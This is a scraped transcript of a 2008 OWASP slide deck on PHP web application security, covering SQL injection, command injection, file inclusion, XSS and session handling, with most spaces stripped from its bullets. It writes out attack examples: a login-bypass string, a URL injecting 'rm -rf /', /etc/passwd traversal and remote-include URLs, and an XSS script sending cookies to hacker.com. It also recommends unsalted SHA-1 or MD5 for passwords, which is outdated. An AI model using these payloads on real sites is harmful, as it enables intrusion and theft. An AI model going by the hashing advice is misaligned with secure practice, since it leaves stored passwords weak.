web-applications and security - owasp · 2008. 5. 28. · security united states department of...
TRANSCRIPT
![Page 2: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/2.jpg)
Questions?
?
![Page 3: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/3.jpg)
eZ Systems
Founded 1999 in Norway
Base philosophy: Open, Share and Innovate!
Privately Owned
85 employees
HQ in Skien, Norway. 8 subsidiaries:
Oslo, Copenhagen, Dortmund, Lyon, Paris, Brussels, Chicago, Vancouver
![Page 4: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/4.jpg)
Customers and VerticalsCustomers and Verticals
![Page 5: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/5.jpg)
Media and Entertainment
![Page 6: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/6.jpg)
Security
United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense (including any divisions of the US armed forces) to store both classified and unclassified information.
![Page 7: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/7.jpg)
Apache is Big!
• ApacheisBigwith70%marketshare
![Page 8: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/8.jpg)
PHP is Big!
• Morethan20MilliondomainsrunningPHP• Manydevelopers,manyprojects• Skills?
![Page 9: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/9.jpg)
Firewalls
• Webtrafficusesport80• Normallynotaffectedbyfirewalls
• SSL• Datatransferprotectedby128/256encryption• Doesnothelpapplicationsecurity
![Page 10: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/10.jpg)
Web Application Firewall
• Intrusiondetectionandpreventionengine• ModSecurityforApache(OpenSource)• IncreasesWebSecurity
• ProtectsWebApplicationagainstknownandunknownattacks• AnalyzingHTTPtraffic
• POSTtraffic• GETtraffic
![Page 11: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/11.jpg)
Typical example
![Page 12: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/12.jpg)
SQL Injection
• Databaselevelvulnerabilityduetoincorrectescaping
• Simpleexample:• LoginSQL:select * from user where login='$login' and
password='$password'• Accessscriptwithlogin.php?login=admin'--&password=fooWithout proper escaping $login = admin'--
• Willauthenticateasadminuserwithoutsupplyingpassword
![Page 13: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/13.jpg)
Preventing SQL injection
• Inputvalidation• Verifythatdatainputisincorrectformat• Typecasting(int)
• SQLescaping• Usefunctionslikepg_escape,mysql_escape_string()andmysql_real_escape_string()toescapequotesetc
![Page 14: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/14.jpg)
Code Injection
• UsingsystemcommandsfromPHP• eval(),exec()andsystem()
• Commandlineconversionofimagessystem( “convert image.jpg thumb.jpg {$width}x{$height}” );
• Scriptaccessedfromconvert.php?width=500&height=300;%20rm%20-rf/
• Thiswillconvertimageandrun“rm-rf/”onthesystem• Useexistingfunctionstoescape
• escapeshellcmd(),escapeshellarg(),realpath(),addslashes()
![Page 15: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/15.jpg)
Dynamic Applications
• Neverincludepagedirectlyfromuserinputif(isset($page)) { include($page); }
• Withoutvalidationattackerscanscript.php?page=/etc/passwdscript.php?page=http://cracker.com/badscript.php
• Abitmoresecure?include( “directory” . $page . “.php” );Not really:script.php?page=../../../etc/passwd%00
![Page 16: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/16.jpg)
GET vs POST
• GETvariablesarelogged• AvailableinHTTPReferrer
• Hijacksession,passwords,personalinfoetc• POSTvariablesisnotavailableinlogfile
• POSTvariablesshouldbeusedforforms
![Page 17: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/17.jpg)
XSS – Cross Site Scripting
• Displayofunwasheduserinput• Forums• Comments
• Vulnerabletosessionhijacks• Attackerscanstealcookies• Commonlynottakenseriously
Example: http://www.owned.com"<script>cookie=document.cookie;window.location='http://hacker.com/steal.php?cookie='+cookie+'';</script>
<script>
cookie=document.cookie;
window.location='http://hacker.com/steal.php?cookie='+cookie+'';
</script>
![Page 18: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/18.jpg)
Input Validation
• Firststepofeveryscriptwhichhandlesinput• Checkif
• Integersareactuallyintegers• e-mailaddressesarecorrect• Namesonlycontainsvalidcharactersfromthecharsets
• Reportgeneralerrorstotheuser• Neverdisplayservererrorstouser
![Page 19: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/19.jpg)
Sub-system Meta-character Washing
• Escapedatapassedtosubsystems• SQLdatabase• Filesystem
• WashingisdifferentfromValidation
![Page 20: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/20.jpg)
Output Washing
• MakesurethatalldataisconvertedtoXHTML• Datacancomefrom
• Userinput• Database• File
• Don'tstoreXHTMLinthedatabase• Convertcontentjustbeforeit'sdisplayed
• Usefunctionslike:htmlspecialchars()
![Page 21: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/21.jpg)
Clear Text Passwords
• Neverstorepasswords• Visibletositeadministrators• Databaseiscrackedandexposed
• Useaonewayhashingalgorithm• SHA-1• MD5
• Example$password = 'secret';If ( sha1( $password ) == 'a375332c48af107c37a0cc53e5a5fb1d535b7950' ){
print( “Password accepted” );}
![Page 22: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/22.jpg)
Error handling
• Alwaysdisableerroroutput• php.ini:• log_errors=On• display_errors=Off
• Errormessagescanbeusedbyattacker
![Page 23: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/23.jpg)
Sessions
• DisabletransparentSIDsupport• php.ini• session.use_trans_sid=0http://example.com/?PHPSSID=cc51dc49792031b9f1f7e2ead5ed6441
• ApachelogsHTTPreferer• Sessionscaneasilybehijacked
![Page 24: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/24.jpg)
Database Sessions
• DonotusethedefaultfilebasedPHPsessionhandlers• Storedin/tmpbydefault• Accessibletoanyuseronthesystem
![Page 25: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/25.jpg)
Server and application configuration
• PHPsourcecodedisplay• AddTypeapplication/x-httpd-php-source.phps
• Transsid->off• Disableglobalvariables
![Page 26: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/26.jpg)
Summary
• FirewallsandSSLcannothelp• Canuseapplicationlevelfirewall(mod_security)• Alwaysvalidateinput• Alwayswashoutput• Configuretheserverandapplicationproperly
![Page 27: Web-applications and Security - OWASP · 2008. 5. 28. · Security United States Department of Defense has audited eZ Publish and certified it for use within the Department of Defense](https://reader033.vdocuments.us/reader033/viewer/2022061000/60af53c601fc2c44381387bf/html5/thumbnails/27.jpg)
Questions?